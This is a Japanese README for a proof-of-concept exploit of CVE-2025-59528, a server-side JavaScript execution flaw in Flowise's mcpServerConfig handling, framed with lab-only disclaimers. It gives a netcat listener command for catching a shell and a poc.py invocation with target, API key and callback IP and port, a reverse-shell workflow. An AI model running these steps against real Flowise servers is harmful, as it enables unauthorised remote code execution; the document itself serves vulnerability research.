
The poc of CVE-2025-59528
隔離された実験室環境で CVE-2025-59528 を調査するための Proof of Concept です。
[!WARNING] 免責事項
このプロジェクトは、教育目的、セキュリティ研究、および自分が所有する、または明示的な許可を得てテストするシステムのテスト にのみ使用することを意図しています。
この PoC を、所有者の許可なく第三者サーバー、公開サービス、またはインフラストラクチャに対して使用しないでください。
作者は、このプロジェクトの誤用によって生じたいかなる損害、データ損失、サービス停止、または法的結果についても責任を負いません。
この PoC は、Flowise におけるユーザー制御の mcpServerConfig の処理に関連する脆弱性である CVE-2025-59528 の潜在的な影響を示します。
特定の条件下では、この脆弱性により、攻撃者がサーバーサイドのコンテキストで任意の JavaScript コードを実行できる可能性があります。
テスト前に、対象インストールの正確なバージョンを必ず確認してください。
requestsPython の依存関係をインストールします:
pip install requests
シェルを取得するために netcat を実行します:
nc -lvnp <YOUR_PORT>
PoC を次のように実行します:
python3 poc.py \
-t http://TARGET:PORT \
-o api_key \
-i CALLBACK_IP \
-p CALLBACK_PORT
テストは、隔離された仮想ネットワークまたは実験室ネットワーク内で実施する必要があります。
┌──────────────────┐
│ PoC Machine │
│ │
│ Python PoC │
└────────┬─────────┘
│
│ Isolated Network
│
┌────────▼─────────┐
│ Flowise 3.0.5 │
│ Test Instance │
└──────────────────┘
意図的に脆弱性のある Flowise インスタンスを、インターネットに直接公開しないでください。
影響を受けるバージョンの Flowise を実行している場合:
このプロジェクトを使用することにより、利用者は適用されるすべての法律および規制を遵守する単独の責任を負うことを承認したものとみなされます。
この PoC は、自分が所有するシステム、またはセキュリティテストの実施について明示的な許可を得たシステムに対してのみ使用してください。
| Argument | Description |
|---|
-t, --target | Flowise テストインスタンスの URL |
-o, --api_key | API キー |
-i, --ip | テストマシンの IP アドレス |
-p, --port | テスト環境で使用するポート |